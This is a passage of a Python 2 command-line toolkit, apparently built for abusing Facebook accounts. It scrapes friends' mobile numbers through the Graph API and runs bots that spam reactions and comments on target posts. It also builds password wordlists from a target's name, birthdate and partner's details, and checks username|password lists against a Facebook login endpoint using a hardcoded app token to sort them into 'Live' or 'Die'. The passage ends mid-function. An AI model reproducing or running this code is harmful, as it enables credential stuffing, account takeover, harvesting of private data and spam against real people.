print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
